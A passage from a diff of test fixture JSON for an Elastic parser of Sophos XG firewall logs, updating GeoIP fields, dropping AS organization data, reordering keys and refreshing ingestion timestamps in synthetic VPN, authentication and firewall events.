175.16.199.1\" name=\"elastic.user@elastic.test.com\" src_mac=", "code": "062910617701", "kind": "event", @@ -3617,19 +3447,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "ip": "175.16.199.1" @@ -3637,19 +3462,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "user": { @@ -3707,20 +3527,13 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715185Z", + "ingested": "2021-12-14T14:54:45.179844344Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:58 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511418055 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Failed\" priority=Warning user_name=\"elastic.user@elastic.test.com\" connectionname=\"Location-1\" connectiontype=\"0\" localinterfaceip=175.16.199.1 localgateway=\"\" localnetwork=\"175.16.199.1/19\" remoteinterfaceip=175.16.199.1 remotenetwork=\"10.84.234.5/32\" message=\"location-1 - IKE message retransmission timed out (Remote: 175.16.199.1)\"", "code": "062511418055", "kind": "event" } }, { - "log": { - "level": "error" - }, - "message": "IKE_SA timed out before it could be established", - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "1234567890123456", @@ -3736,6 +3549,9 @@ "testhost.local" ] }, + "log": { + "level": "error" + }, "sophos": { "xg": { "device_name": "XG230", @@ -3752,13 +3568,17 @@ "host": { "name": "testhost.local" }, + "message": "IKE_SA timed out before it could be established", "event": { "severity": 3, - "ingested": "2021-12-09T13:44:55.715209200Z", + "ingested": "2021-12-14T14:54:45.179844832Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:59 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511318057 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Expire\" priority=Error user_name=\"\" connectionname=\"\" connectiontype=\"0\" localinterfaceip=\"\" localgateway=\"\" localnetwork=\"\" remoteinterfaceip=\"\" remotenetwork=\"\" message=\"IKE_SA timed out before it could be established\"", "code": "062511318057", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -3767,19 +3587,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "user": { @@ -3833,7 +3648,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715215200Z", + "ingested": "2021-12-14T14:54:45.179845198Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:00 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063210617704 log_type=\"Event\" log_component=\"My Account Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"Local\" reason=\"\" src_ip=175.16.199.1 message=\"User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism\" name=\"\" src_mac=", "code": "063210617704", "kind": "event", @@ -3851,13 +3666,6 @@ } }, { - "log": { - "level": "notification" - }, - "message": "Avira AV definitions upgraded from 1.0.407794 to 1.0.407795.", - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "1234567890123456", @@ -3873,6 +3681,9 @@ "testhost.local" ] }, + "log": { + "level": "notification" + }, "sophos": { "xg": { "oldversion": "1.0.407794", @@ -3890,9 +3701,10 @@ "host": { "name": "testhost.local" }, + "message": "Avira AV definitions upgraded from 1.0.407794 to 1.0.407795.", "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715221700Z", + "ingested": "2021-12-14T14:54:45.179845580Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:01 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=064011517819 log_type=\"Event\" log_component=\"Anti-Virus\" log_subtype=\"System\" priority=Notice status=\"Successful\" oldversion=1.0.407794 newversion=1.0.407795 message=\"Avira AV definitions upgraded from 1.0.407794 to 1.0.407795.\"", "code": "064011517819", "kind": "event", @@ -3903,16 +3715,12 @@ "host", "malware" ] - } - }, - { - "log": { - "level": "informational" }, - "message": "Lease 192.168.110.10 expired", "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "XG", "serial_number": "1234567890123457", @@ -3928,6 +3736,9 @@ "defaulttest.local" ] }, + "log": { + "level": "informational" + }, "sophos": { "xg": { "ipaddress": "192.168.110.10", @@ -3945,13 +3756,17 @@ "host": { "name": "defaulttest.local" }, + "message": "Lease 192.168.110.10 expired", "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715277500Z", + "ingested": "2021-12-14T14:54:45.179846074Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:02 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=063411660022 log_type=\"Event\" log_component=\"DHCP Server\" log_subtype=\"System\" status=\"Expire\" priority=Information ipaddress=\"192.168.110.10\" client_physical_address=\"-\" client_host_name=\"\" message=\"Lease 192.168.110.10 expired\" raw_data=\"192.168.110.10\"", "code": "063411660022", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -3960,19 +3775,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "user": { @@ -4026,7 +3836,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715283800Z", + "ingested": "2021-12-14T14:54:45.179846501Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:03 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063110617710 log_type=\"Event\" log_component=\"SSL VPN Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD\" reason=\"\" src_ip=175.16.199.1 message=\"User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism\" name=\"\" src_mac=", "code": "063110617710", "kind": "event", @@ -4105,7 +3915,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715289700Z", + "ingested": "2021-12-14T14:54:45.179846882Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:04 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062811617824 log_type=\"Event\" log_component=\"SSL VPN\" log_subtype=\"System\" priority=Information Mode=\"Remote Access\" sessionid=\"\" starttime=0 user_name=\"elastic.user@elastic.test.com\" ipaddress=10.82.234.5 sent_bytes=0 recv_bytes=0 status=\"Established\" message=\"SSL VPN User 'elastic.user@elastic.test.com' connected \" timestamp=1589960866 connectionname=\"\" remote_ip=10.82.234.12", "code": "062811617824", "kind": "event" @@ -4118,19 +3928,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "user": { @@ -4185,7 +3990,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715295400Z", + "ingested": "2021-12-14T14:54:45.179847371Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:05 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063010517708 log_type=\"Event\" log_component=\"VPN Authentication\" log_subtype=\"Authentication\" status=\"Failed\" priority=Notice user_name=\"hendrikl\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD,AD,Local\" reason=\"wrong credentials\" src_ip=175.16.199.1 message=\"User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials\" name=\"\" src_mac=", "code": "063010517708", "kind": "event", @@ -4199,13 +4004,6 @@ } }, { - "log": { - "level": "notification" - }, - "message": "ATP definitions upgraded from 1.0.0297 to 1.0.0298.", - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "1234567890123456", @@ -4221,6 +4019,9 @@ "testhost.local" ] }, + "log": { + "level": "notification" + }, "sophos": { "xg": { "oldversion": "1.0.0297", @@ -4238,13 +4039,17 @@ "host": { "name": "testhost.local" }, + "message": "ATP definitions upgraded from 1.0.0297 to 1.0.0298.", "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715301300Z", + "ingested": "2021-12-14T14:54:45.179847826Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:06 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=066911518017 log_type=\"Event\" log_component=\"ATP\" log_subtype=\"System\" priority=Notice status=\"Successful\" oldversion=1.0.0297 newversion=1.0.0298 message=\"ATP definitions upgraded from 1.0.0297 to 1.0.0298.\"", "code": "066911518017", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -4302,7 +4107,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715307100Z", + "ingested": "2021-12-14T14:54:45.179848197Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:07 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=062009617502 log_type=\"Event\" log_component=\"GUI\" log_subtype=\"Admin\" status=\"Successful\" priority=Information user_name=\"admin\" src_ip=10.83.234.5 syslog_server_name='Logstash' message=\"SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'\"", "code": "062009617502", "kind": "event" @@ -4315,19 +4120,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "user": { @@ -4380,7 +4180,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715313Z", + "ingested": "2021-12-14T14:54:45.179848569Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:08 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062109517507 log_type=\"Event\" log_component=\"CLI\" log_subtype=\"Admin\" status=\"Failed\" priority=Notice user_name=\"root\" src_ip=175.16.199.1 message=\"User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials\"", "code": "062109517507", "kind": "event", @@ -4388,13 +4188,6 @@ } }, { - "log": { - "level": "notification" - }, - "message": "IPS definitions upgraded from 9.17.09 to 9.17.10.", - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "1234567890123456", @@ -4410,6 +4203,9 @@ "testhost.local" ] }, + "log": { + "level": "notification" + }, "sophos": { "xg": { "oldversion": "9.17.09", @@ -4427,22 +4223,19 @@ "host": { "name": "testhost.local" }, + "message": "IPS definitions upgraded from 9.17.09 to 9.17.10.", "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715318800Z", + "ingested": "2021-12-14T14:54:45.179848935Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:09 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063911517818 log_type=\"Event\" log_component=\"IPS\" log_subtype=\"System\" priority=Notice status=\"Successful\" oldversion=9.17.09 newversion=9.17.10 message=\"IPS definitions upgraded from 9.17.09 to 9.17.10.\"", "code": "063911517818", "kind": "event" - } - }, - { - "log": { - "level": "informational" }, - "message": "Scheduled backup to appliance is successful.", "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "XG", "serial_number": "1234567890123456", @@ -4458,6 +4251,9 @@ "testhost.local" ] }, + "log": { + "level": "informational" + }, "sophos": { "xg": { "device_name": "XG230", @@ -4473,13 +4269,17 @@ "host": { "name": "testhost.local" }, + "message": "Scheduled backup to appliance is successful.", "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715324800Z", + "ingested": "2021-12-14T14:54:45.179849347Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:10 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063311617923 log_type=\"Event\" log_component=\"Appliance\" log_subtype=\"System\" priority=Information backup_mode='appliance' message=\"Scheduled backup to appliance is successful.\"", "code": "063311617923", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "server": { @@ -4550,7 +4350,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715330600Z", + "ingested": "2021-12-14T14:54:45.179849797Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:20 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=062910617703 log_type=\"Event\" log_component=\"Firewall Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"VPN.SSL.Users.elastic\" auth_client=\"IPSec\" auth_mechanism=\"N/A\" reason=\"\" src_ip=10.84.234.38 src_mac=\"\" start_time=1591086575 sent_bytes=0 recv_bytes=0 message=\"User elastic.user@elastic.test.com was logged out of firewall\" name=\"elastic.user@elastic.test.com\" timestamp=1591086576", "code": "062910617703", "kind": "event", @@ -4625,7 +4425,7 @@ "event": { "duration": 164000000000000, "severity": 6, - "ingested": "2021-12-09T13:44:55.715336500Z", + "ingested": "2021-12-14T14:54:45.179850178Z", "original": "device=\"SFW\" date=2017-03-16 time=12:56:01 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618014 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Connected\" eventtime=\"2017-03-16 12:56:01 IST\" duration=164000 branch_name=Gaurav Patel recv_bytes=0 sent_bytes=0 message=\"A350196C47072B0/Gaurav Patel is now re-connected after 164000 ms\"", "code": "066811618014", "kind": "event", @@ -4689,7 +4489,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715342400Z", + "ingested": "2021-12-14T14:54:45.179850554Z", "original": "device=\"SFW\" date=2017-03-16 time=12:53:27 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618015 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Disconnected\" eventtime=\"2017-03-16 12:53:27 IST\" duration=0 branch_name=Gaurav Patel recv_bytes=31488 sent_bytes=22368 message=\"A350196C47072B0/Gaurav Patel is now disconnected\"", "code": "066811618015", "kind": "event", @@ -4753,7 +4553,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715348300Z", + "ingested": "2021-12-14T14:54:45.179850950Z", "original": "device=\"SFW\" date=2017-03-16 time=12:46:26 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618016 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Interim\" eventtime=\"2017-03-16 12:46:26 IST\" duration=0 branch_name=NY recv_bytes=0 sent_bytes=0 message=\"A350196C47072B0/NY transfered bytes TX: 0 RX: 0\"", "code": "066811618016", "kind": "event", @@ -4762,13 +4562,6 @@ } }, { - "log": { - "level": "notification" - }, - "message": "DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86.", - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "S4000806149EE49", @@ -4784,6 +4577,9 @@ "defaulttest.local" ] }, + "log": { + "level": "notification" + }, "sophos": { "xg": { "device_name": "SG430", @@ -4801,13 +4597,17 @@ "host": { "name": "defaulttest.local" }, + "message": "DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86.", "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715354500Z", + "ingested": "2021-12-14T14:54:45.179851424Z", "original": "device=\"SFW\" date=2018-06-06 time=11:12:10 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=063711517815 log_type=\"Event\" log_component=\"DDNS\" log_subtype=\"System\" status=\"Success\" priority=Notice host=test1.customtest.dyndns.org updatedip=10.198.232.86 reason=\"\" message=\"DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86.\"", "code": "063711517815", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "server": { @@ -4828,25 +4628,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 606, - "ip": "175.16.199.1", - "packets": 5 + "packets": 5, + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", @@ -4859,19 +4654,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 62841, @@ -4961,7 +4751,7 @@ "event": { "duration": 11000000000, "severity": 6, - "ingested": "2021-12-09T13:44:55.715400500Z", + "ingested": "2021-12-14T14:54:45.179851825Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:37 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"HTTP\" application_risk=1 application_technology=\"Browser Based\" application_category=\"General Internet\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol=\"TCP\" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"LAN\" srczone=\"LAN\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617925280\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010101600001", "kind": "event", @@ -4998,25 +4788,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", @@ -5029,19 +4814,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 49144, @@ -5131,7 +4911,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715407Z", + "ingested": "2021-12-14T14:54:45.179852223Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:38 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=15 appfilter_policy_id=0 application=\"DNS\" application_risk=1 application_technology=\"Network Protocol\" application_category=\"Infrastructure\" in_interface=\"Port3.400\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol=\"UDP\" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"DMZ\" srczone=\"DMZ\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Start\" connid=\"3360392048\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010101600001", "kind": "event", @@ -5168,25 +4948,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 4980, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", @@ -5198,19 +4973,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 53287, @@ -5290,7 +5060,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715413100Z", + "ingested": "2021-12-14T14:54:45.179852605Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:39 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=175.16.199.1 dst_country_code=\"\" protocol=\"TCP\" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010102600002", "kind": "event", @@ -5422,7 +5192,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715419100Z", + "ingested": "2021-12-14T14:54:45.179852999Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:40 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"tun0\" out_interface=\"Port1\" src_mac=\"\" src_ip=10.82.234.6 src_country_code=\"\" dst_ip=192.168.0.1 dst_country_code=\"\" protocol=\"TCP\" src_port=60102 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010102600002", "kind": "event", @@ -5458,25 +5228,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 18, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "ruleset": "0", @@ -5488,19 +5253,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 55039, @@ -5575,7 +5335,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715424900Z", + "ingested": "2021-12-14T14:54:45.179853372Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:41 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2\" out_interface=\"\" src_mac=c4:f7:d5:b5:47:f4 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=175.16.199.1 dst_country_code=\"\" protocol=\"TCP\" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010302602002", "kind": "event", @@ -5624,19 +5384,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 51826, @@ -5726,7 +5481,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715430600Z", + "ingested": "2021-12-14T14:54:45.179853820Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:42 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=192.168.5.11 dst_country_code=\"\" protocol=\"TCP\" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" 